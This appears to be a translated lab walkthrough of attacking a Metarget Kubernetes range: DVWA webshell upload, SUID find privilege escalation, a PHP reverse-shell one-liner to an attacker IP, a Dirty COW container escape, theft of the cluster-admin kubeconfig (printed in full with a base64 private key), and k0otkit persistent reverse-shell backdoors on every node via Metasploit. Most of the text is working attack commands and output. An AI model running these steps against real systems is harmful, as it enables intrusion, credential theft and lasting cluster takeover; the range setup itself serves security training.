Cloud-Native Attack & Defense Range: Metarget


Metarget currently only supports installation on Ubuntu 16.04 and 18.04; on 20.04 you may run into dependency problems. Installation is straightforward.
Here we use Ubuntu 18.04 as the example:

git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip3 install -r requirements.txt

Then run the following command to install a Docker build carrying the CVE-2019-5736 container-escape vulnerability:

sudo ./metarget cnv install cve-2019-5736

Next, run the following command to install a Kubernetes build carrying the CVE-2018-1002105 privilege-escalation vulnerability:

sudo ./metarget cnv install cve-2018-1002105 --domestic

After the cluster is deployed, run the following command to deploy a containerized DVWA on top of it:

sudo ./metarget appv install dvwa --external

The whole interaction looks like this:

ubuntu@VM-8-10-ubuntu:~/metarget-0.5$ sudo ./metarget cnv install cve-2019-5736
cve-2019-5736 is going to be installed
uninstalling current docker gadgets if applicable
installing prerequisites
adding apt repository deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable
adding apt repository deb http://archive.ubuntu.com/ubuntu xenial-updates universe
adding apt repository deb http://archive.ubuntu.com/ubuntu bionic-updates universe
installing docker-ce with 18.03.1~ce~3-0~ubuntu version

cve-2019-5736 successfully installed
ubuntu@VM-8-10-ubuntu:~/metarget-0.5$ sudo ./metarget cnv install cve-2018-1002105 --domestic
docker already installed
cve-2018-1002105 is going to be installed
uninstalling current kubernetes if applicable
pre-configuring
pre-installing
adding apt repository deb https://mirrors.aliyun.com/kubernetes/apt/ kubernetes-xenial main
installing kubernetes-cni with 0.7.5-00 version
installing kubectl with 1.11.10-00 version
installing kubelet with 1.11.10-00 version
installing kubeadm with 1.11.10-00 version
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-proxy-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-controller-manager-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-apiserver-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-scheduler-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/pause:3.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/etcd-amd64:3.2.18
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/coredns:1.1.3
running kubeadm
installing cni plugin
installing flannel
pulling quay.mirrors.ustc.edu.cn/coreos/flannel:v0.10.0-amd64
generating kubernetes worker script
kubernetes worker script generated at tools/install_k8s_worker.sh
cve-2018-1002105 successfully installed
ubuntu@VM-8-10-ubuntu:~/metarget-0.5$ sudo ./metarget appv install dvwa --external
docker already installed
kubernetes already installed
dvwa is going to be installed
node port 30000 is allocated for service in vulns_app/dvwa/dvwa/dvwa-service.yaml
applying yamls/k8s_metarget_namespace.yaml
applying vulns_app/dvwa/dvwa/dvwa-deployment.yaml
applying data/dvwa-service.yaml
dvwa successfully installed

Based on the command-line output, we can reach the DVWA service inside the container directly from a browser:

As you can see, three commands are all it takes to build a multi-layer target environment.
Cleanup is just as simple; run the following commands in order:

./metarget appv remove dvwa
./metarget cnv remove cve-2018-1002105
./metarget cnv remove cve-2019-5736

References: http://blog.nsfocus.net/metarget/
https://mp.weixin.qq.com/s/H48WNRRtlJil9uLt-O9asw

Log in to DVWA with admin/password and use the file upload module to obtain a webshell.

Upload a Behinder (冰蠍) shell and connect to it to get a webshell; the current user is www-data.

Next, we escalate privileges.

Dirty COW privilege escalation: Linux kernels >= 2.6.22 (released in 2007) are affected, and the bug was not fixed until October 18, 2016.
Check the distribution release:
cat /etc/issue
cat /etc/*-release
Check the kernel version:
uname -a
SUID misconfiguration privilege escalation:
The following commands try to find SUID files owned by root; different variants work better on different systems:
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
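The `-perm -4000` test matches the setuid bit. As a minimal sketch of the same check (Python, standard library only; not part of the original walkthrough), the bit test and the root-owned-SUID walk can be done programmatically:

```python
import os
import stat

def has_suid_bit(mode):
    """True if the setuid bit (octal 4000) is set in a stat mode."""
    return bool(mode & stat.S_ISUID)

def find_suid_root(root="/"):
    """Yield regular files owned by root with the setuid bit set
    (roughly what `find / -user root -perm -4000 -print` does)."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entries, like find's 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_uid == 0 and has_suid_bit(st.st_mode):
                yield path

# 0o104755 = regular file, mode 4755 (rwsr-xr-x)
print(has_suid_bit(0o104755))   # -> True
```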

For ease of testing, I added the SUID bit to find in this environment.

Locate executables with the SUID bit set:

find / -perm -u=s -type f 2>/dev/null

find's -exec option can run arbitrary commands, so a SUID find binary lets us execute commands as root and escalate. Let's try using find to run whoami:

find xxx -exec whoami \;

Next, we can use find to run a reverse-shell command:

find shell.php -exec php -r '$sock=fsockopen("42.xxx.xxx.97",8000);exec("/bin/sh -i <&3 >&3 2>&3");' \;
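The reverse-shell pattern above is simple: the target connects out to a listener on the attacker's machine and wires a shell to the socket. As a self-contained sketch (Python over loopback, with a harmless `echo` standing in for an interactive `/bin/sh`; the host, port, and command here are illustrative, not from the original environment):

```python
import socket
import subprocess
import threading

def listener(sock, results):
    """Attacker side: accept one connection and read what the 'shell' sends back."""
    conn, _addr = sock.accept()
    with conn:
        results.append(conn.recv(4096).decode())

def reverse_connect(host, port, command):
    """Target side: connect out and send the command's output over the socket.
    A real reverse shell would instead dup the socket onto stdin/stdout/stderr,
    which is exactly what the `<&3 >&3 2>&3` redirections in the PHP payload do."""
    with socket.create_connection((host, port)) as s:
        out = subprocess.run(command, shell=True, capture_output=True, text=True).stdout
        s.sendall(out.encode())

srv = socket.socket()
srv.bind(("127.0.0.1", 0))   # port 0: let the OS pick a free port
srv.listen(1)
port = srv.getsockname()[1]

results = []
t = threading.Thread(target=listener, args=(srv, results))
t.start()
reverse_connect("127.0.0.1", port, "echo connected")
t.join()
print(results[0].strip())    # -> connected
```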

Running the reverse-shell command from Behinder kept failing with "operation failed".


So I uploaded a weevely webshell instead, and running the reverse shell from the weevely command line succeeded.

Privilege escalation succeeded and we have a root shell, but it is not a full root shell: its euid is root while its uid is still www-data. In other words, we only obtained a partial, temporary root shell.
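The distinction matters because the kernel's permission checks use the effective UID, while the real UID still records who you are; a SUID binary raises euid to 0 but leaves uid untouched. A small illustrative sketch (not from the original write-up; the www-data uid value 33 is the Debian/Ubuntu convention):

```python
import os

def classify_shell(uid, euid):
    """Classify a (uid, euid) pair the way the escalated shell above would look."""
    if uid == 0 and euid == 0:
        return "full root shell"
    if euid == 0:
        return "euid-only root shell (e.g. via a SUID binary)"
    return "unprivileged shell"

# The DVWA shell after the find-based escalation: uid www-data (33), euid root (0).
print(classify_shell(33, 0))   # -> euid-only root shell (e.g. via a SUID binary)
print(classify_shell(os.getuid(), os.geteuid()))
```

Since the euid is already 0, a common way to promote such a shell to a full root shell is `python -c 'import os; os.setuid(0); os.system("/bin/sh")'`, which `setuid(2)` permits because the caller's effective UID is root.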

Container detection:
During testing I noticed some commands were missing from the environment, suggesting it might be a container. We check for the .dockerenv file and inspect the cgroup to confirm whether we are inside a container. The command output (kubepods) suggests we are currently inside a Kubernetes pod.

ls -la / | grep dockerenv
cat /proc/1/cgroup
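The same two checks can be sketched in a few lines: look for /.dockerenv, and search /proc/1/cgroup for "docker" or "kubepods". The parsing helper is pure, so it is shown against a sample cgroup line (the sample is hypothetical, not output from this environment):

```python
import os

def classify_cgroup(cgroup_text):
    """Guess the runtime environment from the contents of /proc/1/cgroup."""
    if "kubepods" in cgroup_text:
        return "kubernetes pod"
    if "docker" in cgroup_text:
        return "docker container"
    return "probably not containerized"

def in_container():
    """Combine the two checks used above: /.dockerenv plus cgroup inspection."""
    if os.path.exists("/.dockerenv"):
        return True
    try:
        with open("/proc/1/cgroup") as f:
            return classify_cgroup(f.read()) != "probably not containerized"
    except OSError:
        return False

sample = "12:pids:/kubepods/besteffort/pod1234/abcd"
print(classify_cgroup(sample))   # -> kubernetes pod
```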

The rough relationship between k8s, pods, and containers: a cluster contains multiple pods, and a pod contains one or more containers.

Container escape:

CVE-2016-5195 (Dirty COW):
sudo apt install -y make gcc nasm
git clone https://github.com/scumjr/dirtycow-vdso
cd dirtycow-vdso
make

Run ./0xdeadbeef attacker-ip:port
to get a reverse shell from the host. I'll skip the capture here; the environment was so laggy it kept freezing.
Use the reverse shell from the host to steal the Kubernetes administrator's access credentials:

ls -al /root | grep kube
cat /root/.kube/config
# ls -al /root | grep kube
drwxr-xr-x  4 root   root   4096 Oct 31 20:26 .kube
# cat /root/.kube/config
apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUN5RENDQWJDZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeE1UQXpNVEV5TWpZd01Wb1hEVE14TVRBeU9URXlNall3TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTGdtCm12UlcwMWpHK2FFOEVwZU5TUTZWQmxFV3p2dmR3YllWK2MrQ0laNmJEMk9DSkY2MnFLeEdTMUMrV1lDWFdYanQKeGZwYXZ2amVmZitNb1FuU2g5R0dXZ1dTQm9pUmFTdnlJazJYTVFqcUo5YnJwTVBPRDY0MTY4cEhMTTRtWE9pagozZ0plL0pOV1VkOFVhK0dYOWhNODVWeFdPSFF1V3lQR3hlVlg0cnMrU3UyOUpKcHhGdWswNG5uTGFUMklqV05RCkl0UElLTjcxSGpEcUQ1NmMrTjdVQlU3ZExLakw3SlhlUXIwUXoxZndraWllM1BzSEdybVhsQktGQWZ4Z1RKbDMKUlEyZ3lmdXVkbE1yN2dkMVRjT3M0bHVoNXFMS2ZOa1JXenV3RkRkamRPVWFsb1MzN0V4VWZ4d0lMN013ZGt6RApaR0ZiVHo2cGhhWHhPRENtcVQ4Q0F3RUFBYU1qTUNFd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0RRWUpLb1pJaHZjTkFRRUxCUUFEZ2dFQkFGeSt6a1I5bDlWRXN4UERJMDlmMFhXOWZFMXAKVUQ1Y3NRd2FOVCthSEVkYlBVcXZ5b0l3c21YcWF6Z0Zud1ZneVNwZHpLOG1zd0NJa3JsV1hOdEtzRHFhOTA0UwpTWjVyelAwM213bysyNUxkM2dyd2Jla3FQQkIvdmFqUk5KWjUzQWZybTQ3Zm5hQ3BGcUwxc0ZpcUk1K0pVTzk1CjM4eVlnalI2Tm54UVVoMlh5UDVDWkVFNVVabFgrV3lwZVVQZkEvSzUrTGpzRWI2cy9MaGJCUFFVMmtBaGtRVjAKYnhZaTlzQk5pVDdvV3U4MzRCUVBHeTFtVnBZQTF5NHRmd1Fod1lrV0NTd0lsaDZnZ1hYVkkvRW82bkpjNTNnZwpReHpKNG15ZmhQdVRrN3RoY3J5SXFMQXVhZjdkZ1JMVUw5aHV5c1VwNmkzR2dzTUNCalJVOEovQnJLST0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo=
    server: https://10.0.8.10:6443
  name: kubernetes
contexts:
- context:
    cluster: kubernetes
    user: kubernetes-admin
  name: kubernetes-admin@kubernetes
current-context: kubernetes-admin@kubernetes
kind: Config
preferences: {}
users:
- name: kubernetes-admin
  user:
    client-certificate-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUM4akNDQWRxZ0F3SUJBZ0lJYUF4bHVNNjFpUXN3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB5TVRFd016RXhNakkyTURGYUZ3MHlNakV3TXpFeE1qSTJNRFZhTURReApGekFWQmdOVkJBb1REbk41YzNSbGJUcHRZWE4wWlhKek1Sa3dGd1lEVlFRREV4QnJkV0psY201bGRHVnpMV0ZrCmJXbHVNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTIwQ1ZaOHBVY1I3Y3ZTTkkKMzh6dEwrUVNYLzdQSWo5aWdWUFpLN2hKYzdxNlQ5aFBkQS9zODlZb3VUUmlnWFpUQVFSU3BTM3h5TzZNaGR0NAp5cDh4eFlzUzlIbStldnk4Szd0YW4yMUFHN1ZDQVdrMWNvdU5rZGdYUTVBRTJMWHVURUJzc2tLQWVxOVlyQ25nCm8ySVZCZ0U1RzlRNm9oUnlLaU1sOG80T1JScko4ZURISTcra05iV3FKYytSMmJrN3NOWXNsSGpZc0hKR1ZJQ2sKNmNtZElDTUt0aXBtcURZMzVhRldrRE1WdUlTVUd6NTNiVmJYc2xQMkkxcEpjQm1HWERFM28yMWlzNjNjYmJ2ZApuNW5nbE15YXVUa3EzR251ZGdUc0NnR2puTmZZMTVLNGxuZGU3WDN2Z21lYW14eGVxSWhMYkpOTXgwa2poN0JsCkNzVmJEd0lEQVFBQm95Y3dKVEFPQmdOVkhROEJBZjhFQkFNQ0JhQXdFd1lEVlIwbEJBd3dDZ1lJS3dZQkJRVUgKQXdJd0RRWUpLb1pJaHZjTkFRRUxCUUFEZ2dFQkFIYkxQQzRNTnZUWjFJRG4xbXdJTWNVV3BiSjlaU3ZRT29GSQpxYmRTMk43UDFvQnJjcEkxOUtBdVZndHpLVkJmV3JaT1BrRW4xRDdERFRkdWJTbngrdiswcXRqeStMUDdUQ094Ck5aN0J6U0RYclVqRHJUTEc5bk1yUWRUM0ZvZ1NkU09QenV3bC9vRlBvTWVyVkIyTndlR3hEUEVsclVkcXduMzgKOUdFc2p5MnZuc3RROVIrSGs0aldaQ1BZN01zaUdsQUN4TGxrZWYrV2VoQ2hNMHJrKzBoSURlTjNvOGhseU1QWApBMHh5aVJFb3drS2txMU1rUTU2SVllMnVsUElPdFg5Y1NFeUdnbDgvV0ZpdUlGMDA4Z000THMzOCs0T3FjQnNkCmx6K2VZcDl0dWlYZ1ZOSkpUb2hndWRTRUVjdW8vVFlLcU1jU1c0REFiWEp3M1VKbURERT0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo=
    client-key-data: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcFFJQkFBS0NBUUVBMjBDVlo4cFVjUjdjdlNOSTM4enRMK1FTWC83UElqOWlnVlBaSzdoSmM3cTZUOWhQCmRBL3M4OVlvdVRSaWdYWlRBUVJTcFMzeHlPNk1oZHQ0eXA4eHhZc1M5SG0rZXZ5OEs3dGFuMjFBRzdWQ0FXazEKY291TmtkZ1hRNUFFMkxYdVRFQnNza0tBZXE5WXJDbmdvMklWQmdFNUc5UTZvaFJ5S2lNbDhvNE9SUnJKOGVESApJNytrTmJXcUpjK1IyYms3c05Zc2xIallzSEpHVklDazZjbWRJQ01LdGlwbXFEWTM1YUZXa0RNVnVJU1VHejUzCmJWYlhzbFAySTFwSmNCbUdYREUzbzIxaXM2M2NiYnZkbjVuZ2xNeWF1VGtxM0dudWRnVHNDZ0dqbk5mWTE1SzQKbG5kZTdYM3ZnbWVhbXh4ZXFJaExiSk5NeDBramg3QmxDc1ZiRHdJREFRQUJBb0lCQVFDMnFOU1A5cEZvK0tRLwo4cEI0MnhwVGhyZ0VQNTNEVTNrMmMydC9ML1lKczJ3YXJ3UnFsZ1g3a3RTMGp6N3R5bTBXY01xRmtJUlp1TnRiCmZWL2h0c1RaWmFieUJDYzhBU2luYWx2eWJDczNxa2VHTTJkeXVXN0ZMWGtjTVhUSU1yR0gxemgzUGs0Wlo5SUIKQkphQXAyc0thS1J5V2RwTFE2dGxEWWxFelRKNFFIQkRxOHNhUlNKSDlEWTVYMlFybGdnTldOS3FyZU45Q2wzeQo1ZGtyY0ZBVEl0Tjg0SVdiUVpCOEMrbktzZjlxMGdtWmVSSE5TaWxRUG1KVkhxZ0NqSkQ3YUFUWlQvUFRpSURnCi9IU240UVJXU3NITWRwTHozYThLMG1KVUNoeWhuVTVsN0NSdndoeVJPdlJEeE1yV25rRWVuMjBtREFOWUJ0eTEKdWMrdjBsRGhBb0dCQU50RGFqbk5Ba3VFeTNOQ2RPY05iZGhVV3dTcmxJa3JDZElhdkR0cU1PMi9KejdPNkRRegppNGswUkNydytJaUEwaHcwUWcwRnVyRk5BRHFDdjlqWi9LQkt1d3VRdXVIK1FULzlqSng2cy9sWHRualJBTmJ4CmN0TFFLMU5YbWhTODVxQlVadUdGT0w2MjM5c3Q4OWpNcitGeHhRZzFPdXFsQ3VBeFVzOElZcnZ4QW9HQkFQLzgKc2IwdjROb0Q1ZitYVm12Y2Zqd0MrN0ZVVW5aU0daU0tCVDlmbnlobHhxTXU0UDlZVEpKSDdBSTJoQ3M2aUJ6egozT0RCaDlYb083RHJyZVc4OEFRRDZBOXJMSytOTUUva2RFUFBlY0cybUM3dm9aUVhKaHpxaDB5V1lmSitLZTBiCmJqaXlVc3BnbytDR2dRMHJ5M09DUWhScE80cUc2TWVDaWxRZXpJYi9Bb0dCQUp2eGw1UmlkWFptalJoOXRJMDgKSk5yT0xDbm5LbTVnV016QXpRMW8ya0hOU1VsSGVTamZYQ2VLTDgxbXN5ektpaVViR2JzUFR4ZVl6MGZPQkVwagp4MlB0b3BoNEtDSmhaZUR3SU5pT0FJQ2ZYSjBTOFFqdWtwN1RCVzF5Q1pra1BOYmRFSXJtNkZQajF0U1pHeXdmCmNCdmtnYUR6MHVKZDNaMVVGelErSDVMUkFvR0JBS2F3TWtEQ0U0V0RjbG9iZnIvZnBTZUl2Y0k3NlRKNHhZVnUKMW5uczF5T2tHbE9hTEJLNXVhcXJRS2cwUFo0MGovdGlaRnJLU3B4a2k3SHAxYU82Z3dQcVUwcnUrL3NZVWZSRQpDOTA0RmMycEM3SE1nb2QvQjJkZTVGbGZ0MG9ERTJQOUw2bWxuTG1CY2xTNjRQL2xtNmFNbEdEY0lWUlVBdklmCk05b1E4QmViQW9HQVA4UTNxakNUY3R
6aStDRWdOWkIxUUVFblA2ZjdvVVlBYllJSzluc24vSWhJUE8wSEloUWIKTVk2K01BVGJOTWo1eU8zK3N6UUVpaklCdmFVVE9nd1luZUg0NEYxUXlaZmFWbU1DOVFLMFhoSUhUZ0pwdjJMcwo5aGM0VlVLaTN3eVhUaDhxRkkrYjFpV0trb2h1YkloWkhta3BFOURlMnVETXBxMEl4cTA5Q2hBPQotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=

Save the credentials above to a local kubeconfig file, then use them to connect to and inspect the Kubernetes cluster:

kubectl --kubeconfig ./kubeconfig get nodes
kubectl --kubeconfig ./kubeconfig get pods
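The certificate-authority-data, client-certificate-data, and client-key-data fields in the stolen kubeconfig are just base64-encoded PEM blobs: decoding them yields the CA certificate and the client certificate/key that kubectl presents to the API server. A minimal round-trip sketch (the sample PEM below is a placeholder, not material from this cluster):

```python
import base64

def decode_kubeconfig_blob(b64_data):
    """Decode a base64 field from a kubeconfig (e.g. client-certificate-data) to PEM text."""
    return base64.b64decode(b64_data).decode()

# Hypothetical sample: encode a PEM skeleton and round-trip it.
pem = "-----BEGIN CERTIFICATE-----\nMIIB...\n-----END CERTIFICATE-----\n"
blob = base64.b64encode(pem.encode()).decode()
print(decode_kubeconfig_blob(blob).splitlines()[0])   # -> -----BEGIN CERTIFICATE-----
```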

Cluster control + persistence:
k0otkit lets us quickly plant stealthy, persistent reverse-shell backdoors on every node in the cluster once we control the Master node. Clone the GitHub repo to the attacker's own Linux server (k0otkit depends on Metasploit, so msfvenom and msfconsole must be available), set the attacker IP, then run pre_exp.sh:

git clone https://github.com/brant-ruan/k0otkit
cd k0otkit
chmod u+x ./*.sh
# set the ATTACKER_IP variable in pre_exp.sh to your actual attacker IP
./pre_exp.sh


After the script finishes, a new k0otkit.sh file appears in the directory; we will use it shortly. Next, run the handle_multi_reverse_shell.sh script, which opens msfconsole and starts a reverse-shell handler module:

┌──(root💀kali)-[~/k0otkit-main]
└─# ./handle_multi_reverse_shell.sh
[*] Using configured payload generic/shell_reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:4444 
msf6 exploit(multi/handler) > 

Then copy the contents of k0otkit.sh into the root shell obtained from the container escape and run it; the attacker's machine receives the incoming sessions:

k0otkit creates a privileged Pod on every node. These Pods share the node's network and PID namespaces and mount the host's root filesystem at /var/kube-proxy-cache inside the container; the sessions msfconsole received above were thrown back by exactly these privileged Pods. With these de-isolated privileged Pods, we can control the entire cluster with ease.

